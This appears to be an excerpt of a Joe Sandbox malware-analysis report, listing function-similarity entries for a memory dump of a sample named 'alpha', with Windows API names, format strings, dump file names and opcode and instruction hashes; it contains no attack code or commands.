                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDeleteValue$CreateOpen
                                                                    • String ID: %s=%s
                                                                    • API String ID: 1019019434-1087296587
                                                                    • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                    • Instruction ID: 097210e0d0b9e8cedfb42c5eb295f8de026e479d28f77e84c3108c62ddff4fd0
                                                                    • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                    • Instruction Fuzzy Hash: B5518531B08F52C6E760AF29A445B6EF6B6FB897A4F844135CE4D43794DF38D44A8720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsnicmpwcsrchr
                                                                    • String ID: COPYCMD
                                                                    • API String ID: 2429825313-3727491224
                                                                    • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                    • Instruction ID: c7598eb7fb45611efa485c3a2e6cdf401ebbf32bf7f77d078ebc37a73d087ca2
                                                                    • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                    • Instruction Fuzzy Hash: 79F18022F08A52CAFB60AF5190401BDB2B6BB45BBCF814635DE5D236D4DE3CA55AC370
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$FullNamePathwcsrchr
                                                                    • String ID:
                                                                    • API String ID: 4289998964-0
                                                                    • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                    • Instruction ID: a5879b723670741e044cba71743059a713a200a8d3ba510f7afc5468c75dadae
                                                                    • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                    • Instruction Fuzzy Hash: DFC18551A09B56C2EA54BF51D649779E3B2FB85BE8F805531CA0E077D0DE3CA49B8330
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                    • String ID:
                                                                    • API String ID: 3476366620-0
                                                                    • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                    • Instruction ID: e62cf944fbb7dd87c6d69c434532a619cf3b364a0ae435c2ad409c479ec9f8ba
                                                                    • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                    • Instruction Fuzzy Hash: 7A21CD24909E42DAFA147F20A4162B8E6B2FF4AB7DFC45275D55E422E1DF3CA40F8630
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                    • String ID: %9d
                                                                    • API String ID: 1006866328-2241623522
                                                                    • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                    • Instruction ID: b0af004e6956a07f6d7399c30b5f05398a06e9c8a18a147384e8c8fd09920c79
                                                                    • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                    • Instruction Fuzzy Hash: 68515F72A08A428AE700EF51E8405ACB7B6FB4477CF814635DA6D53795DF3CE50A8B30
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                                    • Instruction ID: e98dbf713d9c2da875065adeaca0c7cb831dec8a4b900f6a45080ac66225a04d
                                                                    • Opcode Fuzzy Hash: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                                    • Instruction Fuzzy Hash: BFC1C672A09B8286EB64EF21E4506F9A3B6FB547ACF844135DA1D07794DF3CD54A8330
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1617791916-0
                                                                    • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                    • Instruction ID: eeb3df29afd750673a1877692d4664b4956cba80ea0374b28d62f9e114ba3046
                                                                    • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                    • Instruction Fuzzy Hash: 3AA1BF31A18E4285EA64EF25A4516B9A6B2FF85BA8FC04135DE4E47791DF3CE40AC730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$DiskFreeSpace
                                                                    • String ID: %5lu
                                                                    • API String ID: 2448137811-2100233843
                                                                    • Opcode ID: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                    • Instruction ID: 570e11a9b5a64cf38bd709eb0ecec0feee76c31084bd79580699dc5d19d7a57e
                                                                    • Opcode Fuzzy Hash: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                    • Instruction Fuzzy Hash: 41416022708EC185EB61EF51E8456EAB372FB84798F808035EA4D0B748DF7CD64AC720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID: GeToken: (%x) '%s'
                                                                    • API String ID: 2081463915-1994581435
                                                                    • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                    • Instruction ID: 64d04982928c5362855e967ceb6470d709df33407e4c4c1985765d8bcb64e6bc
                                                                    • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                    • Instruction Fuzzy Hash: 55718F20E0CE4685FB65BF65A854279A6B2AF10B7CFC44535D60E42691EF3CB49BC370
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr
                                                                    • String ID:
                                                                    • API String ID: 1497570035-0
                                                                    • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                    • Instruction ID: 7988ea29c8e7c66a9a7bc48136381dd4e1477211aa5d6cc16d50562e3f5b3b19
                                                                    • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                    • Instruction Fuzzy Hash: A5C10761A08E4286EA54FF21A4502BDE7B2FF847ACF844136DA5E476D5DF3CE44A8730
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 3541575487-0
                                                                    • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                    • Instruction ID: 1fcd0139ba7999f4aac105443f8d733e6b3d3ed5fa61787b4ea2e33d5ddf0703
                                                                    • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                    • Instruction Fuzzy Hash: DAA13661B18B52C1EE24AF659515279E6B2AF44BF8FC44230DE6E477C4EE3CE41A8330
                                                                    APIs
                                                                      • Part of subcall function 00007FF71966CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDA6
                                                                      • Part of subcall function 00007FF71966CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDBD
                                                                    • _pipe.MSVCRT ref: 00007FF719666C1E
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719666CD1
                                                                    • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF719666CFB
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                    • String ID:
                                                                    • API String ID: 624391571-0
                                                                    • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                    • Instruction ID: cf368c24d83731ddd04bd84339af1a4861efdf1005394f0144d104f6a1a13690
                                                                    • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                    • Instruction Fuzzy Hash: 29717E31A08E428AE754BF25D85107CF6B3EF84BB8B944238D65D562E5DF3CA84B8770
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                    • String ID:
                                                                    • API String ID: 4268342597-0
                                                                    • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                    • Instruction ID: 336d9bc252880fef275ee004a48dc1c7660b337380cbc8ef34e20bf3d646565b
                                                                    • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                    • Instruction Fuzzy Hash: 9F815F62A08F82C5EB60AF25A441239F7B2FB45BA8F985135C94D03755DF7CE88A8731
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: OpenToken$CloseProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2991381754-0
                                                                    • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                    • Instruction ID: 7a1b80024ac5557b9fc074de4d59007497b0647ea5274c5b7d508b05c901e442
                                                                    • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                    • Instruction Fuzzy Hash: C4217E32B08A428BE714AF58D4902BDF771EB857B8F904135DB5943694DF78D84ECB21
                                                                    APIs
                                                                    • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF71968C59E), ref: 00007FF719665879
                                                                      • Part of subcall function 00007FF7196658D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF719665903
                                                                      • Part of subcall function 00007FF7196658D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF719665943
                                                                      • Part of subcall function 00007FF7196658D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF719665956
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValueVersion
                                                                    • String ID: %d.%d.%05d.%d
                                                                    • API String ID: 2996790148-3457777122
                                                                    • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                    • Instruction ID: a95f6a1a96fb625606c390b894611d26a749c715bde9278f4d4a2da3c7084b15
                                                                    • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                    • Instruction Fuzzy Hash: DEF0A771A0878187D310AF15B44146AE772FB84794F904138D94907B59CF3CD519CB60
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ErrorFileFindFirstLast
                                                                    • String ID:
                                                                    • API String ID: 2831795651-0
                                                                    • Opcode ID: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                    • Instruction ID: 20b83e10e9fd6d8668052dc5c68f85853c404f9e231aa910a957049635cd6a63
                                                                    • Opcode Fuzzy Hash: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                    • Instruction Fuzzy Hash: 23D1D972608A8286E768EF25E4502BAB7B2FB44BACF941135DE4D07794DF3CD54AC720
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00007FF719667DA1
                                                                      • Part of subcall function 00007FF71967417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7196741AD
                                                                      • Part of subcall function 00007FF71966D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF71966D46E
                                                                      • Part of subcall function 00007FF71966D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF71966D485
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D4EE
                                                                      • Part of subcall function 00007FF71966D3F0: iswspace.MSVCRT ref: 00007FF71966D54D
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D569
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D58C
                                                                    • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF719667EB7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                    • String ID:
                                                                    • API String ID: 168394030-0
                                                                    • Opcode ID: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
